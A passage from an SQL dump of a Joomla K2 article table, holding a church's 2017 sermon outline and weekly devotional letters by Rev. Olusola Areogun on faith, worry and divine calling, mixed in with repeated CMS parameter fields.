'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(42, 'Those that God Weighed… and Failed - Just Weight (6) - Rev.2:1-29, 3:1-22, James 1:2-4, 13-15, Rom.5:3-5', 'weighed', 2, 1, '<p>We’ve looked at various things under the just weight and we proceed today, to see those that God weighed and failed and went into utter destruction.</p>\r\n<p>(1)  BELTESHAZZAR – Dan. 5:25-27</p>\r\n', '\r\n<p>If you read vs. 1-9, you’ll see the act that he embarked upon that God considered improper, it was an unjust thing before divine judgment. He worshipped another God, refused to acknowledge God.</p>\r\n<p>(2)  BALAAM – Num. 22:5-12, 15-20</p>\r\n<p>He wanted a worldly gain and was even ready to do it at the expense of God’s people. He   died as a sooth sayer! The gift of God must not be used to receive worldly gain, he collected money for prophecy – God judged him. Never attempt to commercialize your gifting from God; it leads to loss of gifts then destruction.</p>\r\n<p>(3) YOUNG PROPHET- 1King 19:7-18</p>\r\n<p>This man respected the older prophet to a fault. His problem wasn’t food, but respect – but he respected a wrong value.</p>\r\n<p>Who do you respect so much in the flesh that when they have an opinion contrary to God’s expressed will for you, you’ll obey them and disobey God?</p>\r\n<p>Secondly, he was deceived, he believed a lie, once God has spoken on a matter, it doesn’t matter who comes up with what after that, if you disobey God, the next thing will be judgment.</p>\r\n<p>(4) ELI THE PRIEST – 1Samuel 2:27-36</p>\r\n<p>God found Eli unworthy of the eternal priesthood; he failed by honouring his sons above God. Do you exhibit funny weakness towards a family member because of emotional attachments at the expense of establishing divine standards in the fear the Lord (this most times applies to people in leadership)?</p>\r\n<p>Eli was found wanting and in turn was unqualified for future glory</p>\r\n<p>Are you doing anything that will make God to change His mind about your prophecy?</p>\r\n<p>May the Lord depend on you.</p>', NULL, NULL, '[]', '', '2017-04-17 17:28:14', 196, '', 0, '0000-00-00 00:00:00', '2017-04-17 18:06:30', 196, '2017-04-17 17:28:14', '0000-00-00 00:00:00', 0, 1, 18, 0, 0, '', '', '', '', 5633, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(48, 'From our Father\'s Heart (21/05/2017)', 'from-our-father-s-heart-21-05-2017', 5, 1, '<p><strong>Dearly Beloved of God,</strong></p>\r\n<p>Be Confident in God\'s Promise!</p>\r\n<p>Don\'t let your trust in the Lord die no matter what happens. Even in the face of negative situations and circumstances which seem unfavourable, never let your confidence in God\'s word and ability die. God is always ever able to do what He said He would do. Even when you are hard pressed and are going through tough times, let your heart stay in God and let your confidence in Him never wave.</p>\r\n', '\r\n<p>Abraham stood with his confidence unwavering in God that God was able to give him a son. Even when God demanded Isaac to be slaughtered, Abraham confidently went to the mountain, believing that God was able to raise the dead and he had another encounter with God.</p>\r\n<p>The Father has spoken a lot to us over the years and those words reflect the release of heaven over us. Get all these words and put them over yourself every day. Confess them, recite them, declare them, pray all those prayer points again as we journey on with God and you will see everything become reality in your life. This will determine how the future will be for you. </p>\r\n<p>The future is loaded for us already, but it is your responsibility to activate those words over yourself and your family. You should daily confess those covenants and promises over your life. Let all your words align with the covenants that God has made with us. The devil will try to make you cancel all those words but you must align your mouth with your prophecies. That is your key to the life God has prepared for you in life. </p>\r\n<p>Beloved, when day is about to break, that\'s when the night is darkest. When it looks like you can\'t take it anymore, just remember what God has said to you personally through His Word and to us as a church, then put your confidence in that word. God is committed to bringing what He said to pass.</p>\r\n<p>Don\'t put your confidence in flesh, in men or in things. Don\'t even put your confidence in yourself. Just let your confidence stay and grow in God\'s immutability and the immutability of His word; be patient and let Him work.</p>\r\n<p>Hebrews 10:35</p>\r\n<p>35 Therefore do not cast away your confidence, which has great reward.</p>\r\n<p>Till next week, go and win with Jesus</p>', NULL, NULL, '[]', '', '2017-05-21 18:49:52', 199, '', 0, '0000-00-00 00:00:00', '2017-06-25 11:18:51', 196, '2017-05-21 18:49:52', '0000-00-00 00:00:00', 0, 1, 20, 0, 0, '', '', '', '', 1962, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(43, 'From our Father\'s Heart (16/04/2017)', 'from-our-father-s-heart-16-04-2017', 5, 1, '<p>Dearly Beloved</p>\r\n<p>Let God lighten your candle. Never joke with your intimacy with God. No matter how busy you get, don\'t lose your time with Jesus. Intimacy with the Lord is so vital to your walking and living in the experiences of the believer in life. Intimacy is personal. Though available, intimacy is self-generated; no one can do it for you, you must do it yourself. It is self-cultivated and deliberate.</p>\r\n', '\r\n<p>Be deliberate about personal worship. Keep intimacy and flee anything that can bring cloudiness around your soul such that no light is coming from God. Iniquity and rebellion brings cloudiness around a man’s soul. Yield to correction and discipline. Yield to the Holy Spirit as He corrects you. The Holy Spirit comes first to correct your wrong and then brings light to your soul, spiritual communications or divine instructions don\'t come to a defiled or rebellious spirit. Keep your time and intimacy with God, that’s what guarantees you a baptism of discerning and a mastery of the spirit realm.</p>\r\n<p>Do and work those activities that connect you to the spirit realm.</p>\r\n<p>(1)Pray regularly in the Spirit. Don\'t let your mouth be cold, pray in the Holy Ghost! </p>\r\n<p>(2)Let the Word of God fill your spirit. Regular reading of the Scriptures loads up your spirit making you ready and strong for battle.</p>\r\n<p>The presence of the Lord is our divine advantage</p>\r\n<p>Acts 7:9</p>\r\n<p>9 \"And the patriarchs, becoming envious, sold Joseph into Egypt. But God was with him</p>\r\n<p>The presence of God with you is stronger than any hatred of man or anything man does against you. You can make it in life and destiny with God’s help only, even if there is no human help. You can’t last with mere human help. In fact, God has put a curse on a man that makes man his help (Isa. 30:1–2). The arm of flesh shall fail! Even in relationships, don’t look at what people have but consider who is with them. When you get to a church, don’t consider the fantastic cathedral but ask, “Is God with them?”</p>\r\n<p>Proverbs 10:22</p>\r\n<p>22 The blessing of the Lord makes one rich, And He adds no sorrow with it.</p>\r\n<p>The Lord was with Joseph in Egypt when no one was with him. In fact, all were against him, but one with God is the majority! Let God be with you too. Cultivate intimacy with Him through prayer and His word with the supreme help of the Holy Spirit.  It is not by hard work alone that man makes it!</p>\r\n<p>As you do these and draw near to God, you will experience Him draw closer to you too. Till next week, go and win with Jesus.</p>', NULL, NULL, '[]', '', '2017-04-16 18:21:51', 199, '', 0, '0000-00-00 00:00:00', '2017-05-14 15:38:23', 196, '2017-04-16 18:21:51', '0000-00-00 00:00:00', 0, 1, 15, 0, 0, '', '', '', '', 2124, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(44, 'From our Father\'s Heart (23/04/2017)', 'from-our-father-s-heart-23-04-2017', 5, 1, '<p>Dearly Beloved,</p>\r\n<p>Quit Worrying!</p>\r\n<p>Stop worrying about too many issues. Worry is a negative emotion and negative emotion gets you out of the zone of creativity and inspiration. Worry and worrying is not God\'s way of solving your problems or bringing solutions to matters. Worry magnifies the problems, and also enlarges the fact that the problem is impossible to be solved.</p>\r\n', '\r\n<p>Whenever you worry about a matter, you lose the creativity embedded in your regenerated human spirit to solve the problems. I used to be a champion worrier, that is, I used to worry a lot, until God showed me this Scripture.</p>\r\n<p>Matthew 6:25–27</p>\r\n<p>25 “Therefore I say to you, do not worry about your life, what you will eat or what you will drink; nor about your body, what you will put on. Is not life more than food and the body more than clothing?</p>\r\n<p>26 Look at the birds of the air, for they neither sow nor reap nor gather into barns; yet your heavenly Father feeds them. Are you not of more value than they? </p>\r\n<p>27 Which of you by worrying can add one cubit to his stature?</p>\r\n<p>One thing I so much love about my wife, Rev. (Mrs) Areogun, is that she does not worry about anything. Once I\'m around, she stays calm and does not worry. Beloved, no worrying doesn\'t mean you become irresponsible or carefree about serious matters, no. It means you are shutting out that negative emotion that robs your mind of its creativity and you are activating the working of the Holy Ghost inside you to bring a solution. Sometimes, instead of worrying why don\'t you get into an anointed discussion over the matter with the anointed around you or start praying in the Holy Ghost over the matter.</p>\r\n<p>Whenever a matter that seems difficult comes up, I refuse to be worried, I pray in the Spirit over it and answers begin to rise up from within my spirit; it does not fail. Sometimes I call my wife, we discuss the matter and answers and solutions begin to flow. </p>\r\n<p>If you find yourself worrying over a matter, please note that the devil is about to trap you into a corner of impossibility, so fight to escape before it is too late. Have you not found out that your worst fears have always happened in matters that you have been so worried about? Have you not discovered that your worrying has never solved any problem, rather it has made you more faithless and discouraged and even more sickly in your body. </p>\r\n<p>Beloved, quit worrying! It is a satanic trap. That you worry doesn\'t mean you are responsible, though worrying gives a false sense of responsibility. Open your mind to the Holy Spirit and let worry fade out so that the Holy Spirit can make you creative. Your situation only gets worse when you worry, and you get a solution when you turn it over to God by allowing the Holy Spirit help you. </p>\r\n<p>Let God in on the matter; give the Holy Spirit room to work on it.</p>\r\n<p>Till next week, go and win with Jesus</p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev. Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-04-23 15:38:00', 199, '', 0, '0000-00-00 00:00:00', '2017-05-14 15:55:10', 196, '2017-04-23 15:38:00', '0000-00-00 00:00:00', 0, 1, 16, 0, 0, '', '', '', '', 1653, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(45, 'From our Father\'s Heart (30/04/2017)', 'from-our-father-s-heart-30-04-2017', 5, 1, '<p>Dearly Beloved, </p>\r\n<p>Take heed to your divine call! </p>\r\n<p>2 Timothy 1:9</p>\r\n<p>9 who has saved us and called us with a holy calling, not according to our works, but according to His own purpose and grace which was given to us in Christ Jesus before time began, </p>\r\n<p>If you are saved, there is a call upon your life and you must find that call.</p>\r\n', '\r\n<p>You must find that sacred thing. Your destiny and the call that Paul is referring to in the Scripture above are those activities, duties, responsibilities, assignments, that it will amount to wasting God’s time in creating you if you do every other thing on the earth and you don’t do them.  </p>\r\n<p>When I was in secondary school I was a good footballer and I was a good athlete. I ran 1500 metres race. I played football and I was quite good. I had enough talent in football actually to have gone on because I still remember some of the people that we played football together that went on to play for clubs. One or two people went on to play for the national team and I had enough talent too.  I could have developed that talent. But if I became a football star and I didn’t become a pastor and preacher, God would have considered my coming to the earth a waste. Now, I have become a preacher of the Gospel and not a football star; it is not a waste.  </p>\r\n<p>The calling has nothing to do with your efforts, but after you received the calling you will now have to bring your effort into it. This means you can’t merit the calling of God.  It means the calling of God is something that God has gifted you for. You can’t do enough to qualify for the call. So you can’t take the calling of God and use it for your own purpose. One of the most dangerous things we can do is to take God’s intention for something and use it for another person’s intention.  </p>\r\n<p>One day when you stand before Jesus, He’s not going to ask you how many degrees you obtained as good as those things are. But He’s going to ask you, “Did you do what I sent you to do? What We put inside you, what We invested inside you from heaven, did you release it to mankind?” </p>\r\n<p>There is no blessing that God cannot bring into your life if it will fulfill His purpose and there is no blessing He cannot withdraw from your life if it will fulfill His purpose. God is not committed to our comfort but to His purpose in our lives.  </p>\r\n<p>Till next week, go and win with Jesus </p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-04-30 15:51:00', 199, '', 0, '0000-00-00 00:00:00', '2017-05-14 16:09:19', 196, '2017-04-30 15:51:00', '0000-00-00 00:00:00', 0, 1, 17, 0, 0, '', '', '', '', 1734, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(46, 'From our Father\'s Heart (7/05/2017)', 'from-our-father-s-heart-7-05-2017', 5, 1, '<p>Dearly Beloved, </p>\r\n<p>Live Up To Your Calling! </p>\r\n<p>Raise your life to the level of your calling. Don\'t continue living at the level of your convenience. Jack up your life to the level of God\'s mandate over your life. Whether you like it or not, there is a divine call and mandate of heaven over your life that you must give account for when you come face-to-face with the Father in eternity and you need to raise your life to the level of that divine mandate. </p>\r\n', '\r\n<p>Many believers are living lower than the call of God upon their lives. They know they are called, they have a sense of the call, but have however chosen to stay at convenience level where their lives are not being driven and harnessed in accordance with the capacity that God has placed within them. </p>\r\n<p>Beloved, the devil only recognizes you in the call and you are only untouchable to the enemy when you are living at the level of God\'s call over your life. It is your active operation in the calling that silences and terrifies the enemy. That is why he tries to batter people and make them unfit for destiny before they discover. However, you are privileged of God to be trained for your destiny and calling. Therefore, embrace it and jack up your life to the level of God\'s call for you. </p>\r\n<p>There are two names a man bears:</p>\r\n<p>1. The name men call you by virtue of your birth circumstances, problems or background.</p>\r\n<p>2. The name of your destiny that God has called you. That is the name you must discover and fulfill. </p>\r\n<p>You must make up your mind to discover that name and live by it. Heaven is expectant over your life and you must not disappoint. </p>\r\n<p>Till next week, go and win with Jesus. </p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-05-14 16:09:20', 199, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, '2017-05-14 16:09:20', '0000-00-00 00:00:00', 0, 1, 18, 0, 0, '', '', '', '', 2278, 